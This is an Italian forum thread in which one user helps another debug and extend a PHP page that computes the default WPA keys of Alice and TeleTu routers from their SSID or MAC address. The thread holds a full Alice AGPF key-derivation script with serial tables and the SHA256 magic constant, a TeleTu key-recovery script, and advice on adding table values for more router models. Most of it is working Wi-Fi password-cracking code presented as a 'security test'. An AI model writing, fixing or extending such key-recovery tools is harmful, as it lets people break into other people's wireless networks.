Script PHP per testare sicurezza Wifi

[Mattia]

Devi eliminare:

Codice PHP:

var_dump($_POST); 


Per eliminare il messaggio "Non hai scelto nessun operatore, riprova", devi cancellare le righe:

Codice PHP:

default:
    //Messaggio di errore per non aver scelto uno dei due router
    echo 'Non hai scelto nessun operatore, riprova';
break; 


Pubblica i "caratteri strani" che ti escono, altrimenti non so come aiutarti per eliminarli.

Per quanto riguarda lo script di Alice devi modificare la riga:

Codice PHP:

$SSID       = isset($_POST['sid']) && is_string($_POST['sid']) ? $_POST['sid'] : ''; 


Con:

Codice PHP:

$SSID = isset($_POST['sid']) && is_string($_POST['sid']) ? (ucfirst(strtolower(substr($_POST['sid'], 0, 6))) == 'Alice-' ? $_POST['sid'] : 'Alice-'.$_POST['sid']) : ''; 


[Chandler]

Ho rimosso il codice ma i "caratteri strani" restano lo stesso e sono questi:

8"��H

Tengo a precisare che questi caratteri vengono stampati solo dopo il calcolo e SOLO dal form fastw*b (con alice non da problemi).
Ho risolto anche l'intoppo di Alice, adesso mi chiedo se è possibile estendere le tabelle come in QUESTO script

[Mattia]

Per non stampare la stringa di caratteri strani devi eliminare questa riga nel file dello script di Fastweb:

Codice PHP:

echo "$str\n"; 


Per estendere le tabelle potresti utilizzare direttamente gli script che hai linkato facendo le stesse modifiche che hai fatto su quelli che utilizzi adesso.

[Chandler]

Quindi devo solo aggiungere il codice alla pagina che ho creato??

Per non stampare la stringa di caratteri strani devi eliminare questa riga nel file dello script di Fastweb:

Codice PHP:

echo "$str\n"; 


Per estendere le tabelle potresti utilizzare direttamente gli script che hai linkato facendo le stesse modifiche che hai fatto su quelli che utilizzi adesso.

[Mattia]

Per estendere le tabelle devi modificare i singoli script (per intenderci quelli di Alice e di FastWeb) che fanno il calcolo vero e proprio.

[Chandler]

Intendi dire che questo è già lo script modificato di Alice??

Codice:

<?php
/***************************************************************************
*   Alice AGPF WPA Discovery                                              *
*   by evilsocket – evilsocket@gmail.com – http://www.evilsocket.net      *
*   based on <http://wifiresearchers.wordpress.com/>                      *
*                                                                         *
*   This program is free software; you can redistribute it and/or modify  *
*   it under the terms of the GNU General Public License as published by  *
*   the Free Software Foundation; either version 2 of the License, or     *
*   (at your option) any later version.                                   *
*                                                                         *
*   This program is distributed in the hope that it will be useful,       *
*   but WITHOUT ANY WARRANTY; without even the implied warranty of        *
*   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the         *
*   GNU General Public License for more details.                          *
*                                                                         *
*   You should have received a copy of the GNU General Public License     *
*   along with this program; if not, write to the                         *
*   Free Software Foundation, Inc.,                                       *
*   59 Temple Place – Suite 330, Boston, MA  02111-1307, USA.             *
***************************************************************************/
/*
* Tabella per il calcolo del seriale.
*
* First SSID digits => ( SN1, k, Q )
*/
$SN_TABLE   = array( ’96′ => array( ’69102′, 13, 96017051 ),
’93′ => array( ’69101′, 13, 92398366 ),
’56′ => array( ’67902′, 13, 54808800 ),
’55′ => array( ’67904′, 8,  55164449 ),
’54′ => array( ’67903′, 8,  52420689 ),
’48′ => array( ’67903′, 8,  47896103 ),
’46′ => array( ’67902′, 13, 39015145 ) );
/*
* Numeri magici da utilizzare per il calcolo dell’SHA256.
*/
$ALIS       = “\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15\xCA\xAF\x12\x84\x02\xAC\x56\x00\x05\xCE\x20\x75\x91\x3F\xDC\xE8″;
/*
* Tabella di conversione da hash a wpa.
*/

$CONV_TABLE = “0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdef
ghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwx
yz0123456789abcdefghijklmnopqrstuv”.
“wxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789ab
cdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuv
wxyz0123″;
/*
* SSID della rete.
*/
$SSID       = “Alice-96154825″;
/*
* MAC address del router.
*/
$MAC        = “\x00\x23\x8E\x01\x02\x03″;
/*
* Calcolo il seriale in base al SSID e alla tabella dei valori noti.
*/
$SN         = SSID2SN($SSID);
/*
* Calcolo SHA256( MagicN + SN + MAC )
*/
$hash       = SHA256( $ALIS.$SN.$MAC );
/*
* Converto la stringa dell’hash in un array di byte.
*/
$bytes      = hash2bytes($hash);
/*
* Trovo la WPA utilizzando i primi 24 byte dell’hash come indici della tabella di covnersione.
*/
$wpa   = “”;
for( $i = 0; $i < 24; $i++ ){
$wpa .= $CONV_TABLE[ $bytes[$i] ];
}

echo “WPA : $wpa\n”;

/*
* Funzione per risalire al seriale del router partendo dal suo SSID e utilizzando
* le tabelle dei valori noti.
*/
function SSID2SN( $ssid ){
global $SN_TABLE;
/*
* Prelevo il numero intero dall’SSID e ne prendo le prime due cifre
* per verificare che il router sia presente nella tabella.
*/
preg_match_all( “/^Alice\-([0-9]+)/”, $ssid, $m );
$ssidn = $m[1][0];
$id    = substr( $ssidn, 0, 2 );

if( isset( $SN_TABLE[$id] ) ){
/*
* Ok, il router è presente nella tabella, prelevo la prima parte del seriale e
* le costanti k e Q da utilizzare nell’equazione finale.
*/
$sn1 = $SN_TABLE[$id][0];
$k   = $SN_TABLE[$id][1];
$Q   = $SN_TABLE[$id][2];
/*
* La seconda parte del seriale equivale a :
*      (SSID – Q) / k
*/
$sn2 = ((int)$ssidn – $Q) / $k;
/*
* Restituisco il seriale completo.
*/
return $sn1.’X’.sprintf( “%07s”, $sn2 );
}
/*
* Router non presente nella tabella.
*/
else{
die( “La serie ‘Alice-$id******’ non è presente nella tabella e non è supportata.\n” );
}
}
/*
* Funzione per il calcolo di un hash SHA256.
*/
function SHA256( $phrase ){
return bin2hex( mhash( MHASH_SHA256, $phrase ) );
}
/*
* Funzione per convertire un hash in un array di byte interi.
*/
function hash2bytes( $hash ){
preg_match_all( “/[a-f0-9]{2}/i”, $hash, $hash_bytes );
$bytes = array();
foreach( $hash_bytes[0] as $byte ){
$bytes[] = hexdec($byte);
}

return $bytes;
}

?>

al quale dorei riapportare le modifiche da te precedentemente dette (ovvero $SSID da sostituire ed echo wpa da eliminare)

[Mattia]

Dando un'occhiata veloce mi sembra uguale a quello iniziale. Credevo che nella pagina linkata c'era qualche script diverso.
Per estendere la tabella devi modificare l'array $SN_TABLE aggiungendo altri valori.

[Chandler]

e questi valori dove li trovo?? facendo un controllo vedo chje in questa che ho appena pubblicato sono identici al mio file di alice

[Mattia]

Non lo so, dovresti fare qualche ricerca su Internet.

[Chandler]

Ok, credevo fosse già tutto compreso in quellos cript..e invece no!
Cmq, ho cercato su web e ho trovato QUESTA pagina con questa tabella... come potrai vedere i valori sono nel formato

"995,69102,13,99208960,001D8B";

mi sembra di facile lettura, l'unico dubbio lo ho sul primo valore, il 995 che non capisco se si deve approssimare a 99 o a 95 o forse lasciarlo invariato a 995! Tu che ne pensi?

[Mattia]

Così a prima vista credo che rimanga 995, però non so dirtelo con sicurezza.

[Chandler]

Ok, farò una prova e vedremo se funziona correttamente
Ti aggiorno...
Grazie mille

p.s. non so se hai notato, ma c'è un piccolo problemino coi tab...se ad esempio inserisco il SSID di Alice e poi clicco su calcola, la pagina refresha e ritorna su fastweb (se mi sposto su alice leggo correttamente il risultato)...come potrei ovviare questo problema??

[Mattia]

Per il problema dei tab potresti salvarti nello switch una variabile che sarà il numero (partendo da 0) del tab da aprire.
Quindi lo switch diventerà (controlla che non abbia aggiunto o eliminato qualcosa che hai cambiato negli ultimi giorni):

Codice PHP:

switch (isset($_POST['router']) ? $_POST['router'] : null) {
    case 'fastweb':
        //Script per il router di Fastweb
        include('fastweb.php');
        $tab = 0;
    break; 
    case 'alice':
        //Script per il router di Alice
        include('alice.php');
        $tab = 1;
    break;
    case 'teletu':
        //Script per il router di Teletu
        include('teletu.php');
        $tab = 2;
    break;
    case 'vodafone':
        //Script per il router di Vodafone
        $tab = 3;
    break;
    default:
        $tab = 0;
    break;
} 


Poi dovrai utilizzare la variabile $tab per aprire il tab corretto con l'opzione active:

Codice:

$('#tabs').tabs({
    'event': 'mouseover',
    'active': <?php echo intval($tab);?>
});

EDIT: Come non detto, l'opzione "active" vale per la versione 1.9 di jQuery UI, mentre nelle versioni precedenti (tu utilizzi la 1.8) devi utilizzare selected:

Codice:

$('#tabs').tabs({
    'event': 'mouseover',
    'selected': <?php echo intval($tab);?>
});

[Chandler]

ma quindi questo selected in quale file jquery devo applicarlo??

[Mattia]

In nessun file jQuery, devi modificare il codice JavaScript della tua pagina come il secondo che ti ho scritto nel messaggio precedente.

[Chandler]

Adesso funziona correttamente
Non capisco invece, cosa non va nello script di teletu...sicuramente è strutturato diversamente rispetto agli altri due script...

In nessun file jQuery, devi modificare il codice JavaScript della tua pagina come il secondo che ti ho scritto nel messaggio precedente.

[Mattia]

Per lo script di TeleTu mi dovresti dire se c'è qualche errore o cosa fa per poterti aiutare a correggerlo.

[Chandler]

se provo ad inserire un SSID mi da questo errore:

Parse error: syntax error, unexpected ':', expecting ')' in /membri/aiele/wifi/teletu.php on line 24

[Mattia]

C'è un errore di sintassi alla riga 24 dello script di TeleTu. Se pubblichi quella riga di codice, posso aiutarti a correggerla.

[Chandler]

Lo script, se non erro, te lo avevo inviato via mail... cmq alla riga 24 c'è questo codice:

Codice:

$string = array(“:”, ”-”, ”.”, ” ”, ”,”,);

[Mattia]

Modifica quella riga in questo modo:

Codice PHP:

$string = array(":", "-", ".", " ", ","); 


[Chandler]

grazie, appena torno a casa provo... se apro lo script con dreamweaver mi segnala anche la riga 25... te la posto così mi dici se ti sembra ok o se bisogna correggere qualcosa:

Codice:

$mac1 = str_replace($string, ”", $MAC);

[Mattia]

Il problema sono le virgolette curve (“ e ”) che devi trasformare in virgolette normali (").

[Chandler]

Quindi se correggendo la riga 24 mi da errore alla riga 25 devo correggere così?

Codice:

$mac1 = str_replace($string, "", $MAC);

[Mattia]

Sì, devi correggere così, ma credo che anche altre righe avranno lo stesso problema.

[Chandler]

ho sostituito tutte le virgolette con quelle corrette e adesso mi da questo errore:

Parse error: syntax error, unexpected T_STRING in /membri/aiele/wifi/teletu.php on line 56

il codice della riga è il seguente:

Codice PHP:

$SN = $aLine[3]."Y".$SN2; 


[Mattia]

La riga 56 mi sembra corretta; forse c'è qualche errore nella riga 55.

[Chandler]

Ti metto tutto lo script....

Codice:

<?php
/***************************************************************************
*   Script PHP per la verifica di chiavi WPA su reti TeleTu               *
*                                                                         *
*   TeleTu for iWiFiSecure                                                *
*   by rriky92 - rriky92@gmail.com - http://www.rriky92.it                *
*   basato sul lavoro di swsooue e deinde                                 *
*                <http://www.wifi-shark.co.cc/forum>                      *
*                                                                         *
*   This program is free software; you can redistribute it and/or modify  *
*   it under the terms of the GNU General Public License as published by  *
*   the Free Software Foundation; either version 2 of the License, or     *
*   (at your option) any later version.                                   *
*                                                                         *
*   This program is distributed in the hope that it will be useful,       *
*   but WITHOUT ANY WARRANTY; without even the implied warranty of        *
*   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the         *
*   GNU General Public License for more details.                          *
*                                                                         *
***************************************************************************/
//ricevo indirizzo mac tramite GET
$MAC = $_GET["mac"];
//Rimuovo eventuali doppi punti e altre cose dal MAC
$string = array(":", "-", ".", " ", ",");
$mac1 = str_replace($string, "", $MAC);
//Converto in maiuscole
$mac1 = strtoupper($mac1);
//prelevo prime 6 cifre dal MAC
$mac2 = substr($mac1,0,6);
//prelevo ultime 6 cifre dal MAC
$mac3 = substr($mac1,-6);;
// carica la lista della tabella
$fileData = @file(‘table.txt’);
if ($fileData == false) die("Non riesco a trovare il file table.txt");
foreach($fileData as $line_num => $line) {
if($line == "){
continue;
}
//creo array delle cose saparate dalla virgola nella tabella
$aLine = explode(‘,’ , $line);
//controllo quale riga contenga le prime 6 cifre del mac
if($mac2 == $aLine[0]){
//controllo quale riga tra quelle che soddisfano la richiesta precedente
//contenga il MAC compreso
if ($mac3 > $aLine[1]){
if ($mac3 < $aLine[2]){
//converto in decimali le ultime 6 cifre del MAC e la BASE
$mac3dec = hexdec($mac3);
$aLine4dec = hexdec($aLine[4]);
//eseguo la sottrazione
$sottr = $mac3dec - $aLine4dec;
//eseguo la divisione
$SN2 = $sottr / 2;
//verifico la lunghezza del risultato se = a 7 imposto valore wpa
if (strlen($SN2) > 6){
$SN = $aLine[3]."Y".$SN2;
}
//verifico la lunghezza del risultato se < 7
if (strlen($SN2) < 7){
//controllo quanti caratteri manco per arrivare a 7
$lung = 7 - strlen($SN2);
//inserisco caratteri rimanenti prendendoli dal SN2
$rest = substr($SN2, 0, $lung);
//Converto quelle cifre come 0
$CONV = array("1?,"2?,"3?,"4?,"5?,"6?,"7?,"8?,"9?,);
$SNP = str_replace($CONV, "0?, $rest);
//appendo gli 0 ottenuti davanti a SN2
$SN3 = $SNP.$SN2;
}
//controllo che ora siano 7 caratteri
if (strlen($SN3) > 6){
//imposto valore wpa
$SN = $aLine[3]."Y".$SN3;
}
}
}
}
}
//stampo WPA
echo $SN;
?>

[Mattia]

Ho trovato alcuni errori. Ti indico il numero di riga e la modifica.

Riga 36:

Codice PHP:

if($line == ""){ 


Riga 40:

Codice PHP:

$aLine = explode("," , $line); 


Riga 65 e 66

Codice PHP:

$CONV = array("1","2","3","4","5","6","7","8","9");
$SNP = str_replace($CONV, "0", $rest); 


Infine devi assegnare il risultato dello script alla variabile $wpa. Quindi devi modificare:

Codice PHP:

//stampo WPA
echo $SN; 


Con:

Codice PHP:

$wpa = $SN; 


[Chandler]

Adesso mi da il messaggio

Non riesco a trovare il file table.txt

alchè mi son ricordato di avere un file tab_teletu.txt (trovato assieme all'algo) con dentro le tabelle nel medesimo formato dell'ultimo link delle tabelle di alice (del 21/10/2012). Ho provato a metterlo nella stessa cartella e modificare il codice sostituendo "table.txt" con "tab_teletu.txt" ma continua a darmi il messaggio:

Non riesco a trovare il file tab_teletu.txt